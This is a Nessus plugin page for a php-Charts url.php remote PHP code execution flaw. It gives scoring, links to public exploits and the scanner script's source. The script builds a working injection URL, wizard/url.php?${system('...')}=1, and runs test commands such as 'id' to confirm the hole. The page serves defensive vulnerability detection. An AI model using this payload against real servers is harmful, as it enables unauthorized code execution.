php-Charts url.php Remote PHP Code Execution - Nessus
High Plugin ID: 64557This page contains detailed information about the php-Charts url.php Remote PHP Code Execution Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.
Plugin Overview
ID: 64557
Name: php-Charts url.php Remote PHP Code Execution
Filename: php_charts_url_code_exec.nasl
Vulnerability Published: 2013-01-16
This Plugin Published: 2013-02-11
Last Modification Time: 2022-04-11
Plugin Version: 1.11
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies:
os_fingerprint.nasl, php_charts_detect.nasl
Required KB Items [?]: www/php-charts
Vulnerability Information
Severity: High
Vulnerability Published: 2013-01-16
Patch Published: N/A
CVE [?]: N/A
CPE [?]: x-cpe:/a:php_charts:php_charts
Synopsis
The remote web server hosts an application that allows arbitrary PHP code execution.
Description
The php-Charts install hosted on the remote web server contains a flaw that could allow arbitrary PHP code execution. Input passed to the 'wizard/url.php' script is not properly sanitized before being used in a PHP eval() call. An unauthenticated, remote attacker could leverage this vulnerability to execute arbitrary PHP code on the remote host.
Solution
Unknown at this time.
Public Exploits
Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available
Here's the list of publicly known exploits and PoCs for verifying the php-Charts url.php Remote PHP Code Execution vulnerability:
- Metasploit: exploit/unix/webapp/php_charts_exec
[PHP-Charts v1.0 PHP Code Execution Vulnerability] - Exploit-DB: exploits/php/webapps/24201.txt
[EDB-24201: PHP-Charts - Arbitrary PHP Code Execution]
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:F/RL:U/RC:ND
CVSS Base Score: | 7.5 (High) |
Impact Subscore: | 6.4 |
Exploitability Subscore: | 10.0 |
CVSS Temporal Score: | 7.1 (High) |
CVSS Environmental Score: | NA (None) |
Modified Impact Subscore: | NA |
Overall CVSS Score: | 7.1 (High) |
CVSS Base Score: | 8.8 (High) |
Impact Subscore: | 5.9 |
Exploitability Subscore: | 2.8 |
CVSS Temporal Score: | 8.6 (High) |
CVSS Environmental Score: | NA (None) |
Modified Impact Subscore: | NA |
Overall CVSS Score: | 8.6 (High) |
Go back to menu.
Plugin Source
This is the php_charts_url_code_exec.nasl nessus plugin source code. This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(64557);
script_version("1.11");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_bugtraq_id(57448);
script_xref(name:"EDB-ID", value:"24201");
script_name(english:"php-Charts url.php Remote PHP Code Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that allows arbitrary PHP
code execution.");
script_set_attribute(attribute:"description", value:
"The php-Charts install hosted on the remote web server contains a flaw
that could allow arbitrary PHP code execution. Input passed to the
'wizard/url.php' script is not properly sanitized before being used in a
PHP eval() call. An unauthenticated, remote attacker could leverage
this vulnerability to execute arbitrary PHP code on the remote host.");
# https://packetstormsecurity.com/files/119582/PHP-Chart-1.0-Code-Execution.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6e66577d");
script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:U/RC:X");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'PHP-Charts v1.0 PHP Code Execution Vulnerability');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2013/01/16");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/02/11");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"x-cpe:/a:php_charts:php_charts");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("php_charts_detect.nasl", "os_fingerprint.nasl");
script_require_keys("www/php-charts");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include("data_protection.inc");
port = get_http_port(default:80, php:TRUE);
install = get_install_from_kb(appname:'php-charts', port:port, exit_on_fail:TRUE);
# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ('Windows' >< os)
cmds['ipconfig/all'] = 'Windows IP Configuration|IP(v[46])? Address[ .]+: ';
else
cmds['id'] = 'uid=[0-9]+.*gid=[0-9]+.*';
}
else
{
cmds['ipconfig/all'] = 'Windows IP Configuration|IP(v[46])? Address[ .]+: ';
cmds['id'] = 'uid=[0-9]+.*gid=[0-9]+.*';
}
foreach cmd (keys(cmds))
{
output = "";
url = install['dir']+"/wizard/url.php?${system('"+cmd+"')}=1";
res = http_send_recv3(
method : "GET",
item : url,
port : port,
exit_on_fail:TRUE
);
body = res[2];
if (!egrep(string:body, pattern:cmds[cmd])) continue;
output = body;
# Remove any leading PHP errors or HTML
if ("ipconfig" >< cmd)
output_starter = "Windows IP Config";
else
output_starter = "uid=";
output = substr(output, stridx(output, output_starter));
# Remove any trailing PHP errors or HTML
if ("<" >< output)
{
html_start = stridx(output, "<");
output = substr(output, 0, html_start - 1);
}
# Trim output if overly lengthy
output = beginning_of_response(resp:output, max_lines:20);
break;
}
if (output)
{
if (report_verbosity > 0)
{
# Add request
report =
'\nNessus executed "' + cmd + '" by sending the following request :\n\n' +
crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n' +
chomp(http_last_sent_request()) + '\n' +
crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n';
# Add command output
if (report_verbosity > 1)
report += '\nWhich resulted in the following command output :\n\n' + data_protection::sanitize_uid(output:output);
security_hole(port:port, extra:report);
}
else security_hole(port);
}
else
{
base_url = build_url(qs:install['dir']+'/', port:port);
audit(AUDIT_WEB_APP_NOT_AFFECTED, "php-Charts", base_url);
}
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix:
/opt/nessus/lib/nessus/plugins/php_charts_url_code_exec.nasl
- Windows:
C:\ProgramData\Tenable\Nessus\nessus\plugins\php_charts_url_code_exec.nasl
- Mac OS X:
/Library/Nessus/run/lib/nessus/plugins/php_charts_url_code_exec.nasl
Go back to menu.
How to Run
Here is how to run the php-Charts url.php Remote PHP Code Execution as a standalone plugin via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select php-Charts url.php Remote PHP Code Execution plugin ID 64557.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl php_charts_url_code_exec.nasl -t <IP/HOST>
Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a php_charts_url_code_exec.nasl -t <IP/HOST>
Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - php_charts_url_code_exec.nasl -t <IP/HOST>
Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):
/opt/nessus/bin/nasl -K /tmp/state php_charts_url_code_exec.nasl -t <IP/HOST>
Go back to menu.
References
BID | SecurityFocus Bugtraq ID: See also:
- https://www.tenable.com/plugins/nessus/64557
- http://www.nessus.org/u?6e66577d
- https://vulners.com/nessus/PHP_CHARTS_URL_CODE_EXEC.NASL
- 67174 - php-Charts wizard/index.php PHP Execution
- 35750 - PHP < 5.2.9 Multiple Vulnerabilities
- 41014 - PHP < 5.2.11 Multiple Vulnerabilities
- 42862 - PHP 5.3 < 5.3.1 Multiple Vulnerabilities
- 51139 - PHP 5.2 < 5.2.15 Multiple Vulnerabilities
- 51140 - PHP 5.3 < 5.3.4 Multiple Vulnerabilities
- 52717 - PHP 5.3 < 5.3.6 Multiple Vulnerabilities
- 55925 - PHP 5.3 < 5.3.7 Multiple Vulnerabilities
- 57537 - PHP < 5.3.9 Multiple Vulnerabilities
- 57557 - PHP Version 5 Hash Collision Form Parameter Parsing Remote DoS
- 58988 - PHP < 5.3.12 / 5.4.2 CGI Query String Code Execution
- 59056 - PHP 5.3.x < 5.3.13 CGI Query String Code Execution
- 59057 - PHP 5.4.x < 5.4.3 Multiple Vulnerabilities
- 59088 - PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution
- 59529 - PHP 5.3.x < 5.3.14 Multiple Vulnerabilities
- 59530 - PHP 5.4.x < 5.4.4 Multiple Vulnerabilities
- 60085 - PHP 5.3.x < 5.3.15 Multiple Vulnerabilities
- 60086 - PHP 5.4.x < 5.4.5 _php_stream_scandir Overflow
- 67174 - php-Charts wizard/index.php PHP Execution
- 67259 - PHP 5.3.x < 5.3.27 Multiple Vulnerabilities
- 69348 - PHP 5.5.x < 5.5.1 xml.c Buffer Overflow
- 69401 - PHP 5.4.x < 5.4.19 Multiple Vulnerabilities
- 70728 - Apache PHP-CGI Remote Code Execution
- 71426 - PHP 5.3.x < 5.3.28 Multiple OpenSSL Vulnerabilities
- 71427 - PHP 5.4.x < 5.4.23 OpenSSL openssl_x509_parse() Memory Corruption
- 71428 - PHP 5.5.x < 5.5.7 OpenSSL openssl_x509_parse() Memory Corruption
- 76281 - PHP 5.4.x < 5.4.30 Multiple Vulnerabilities
- 76282 - PHP 5.5.x < 5.5.14 Multiple Vulnerabilities
- 77285 - PHP 5.3.x < 5.3.29 Multiple Vulnerabilities
- 77402 - PHP 5.4.x < 5.4.32 Multiple Vulnerabilities
- 77403 - PHP 5.5.x < 5.5.16 Multiple Vulnerabilities
- 78545 - PHP 5.4.x < 5.4.34 Multiple Vulnerabilities
- 78546 - PHP 5.5.x < 5.5.18 Multiple Vulnerabilities
- 78547 - PHP 5.6.x < 5.6.2 Multiple Vulnerabilities
- 78556 - PHP 5.6.0 Multiple Vulnerabilities
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file php_charts_url_code_exec.nasl version 1.11. For more plugins, visit the Nessus Plugin Library.
Go back to menu.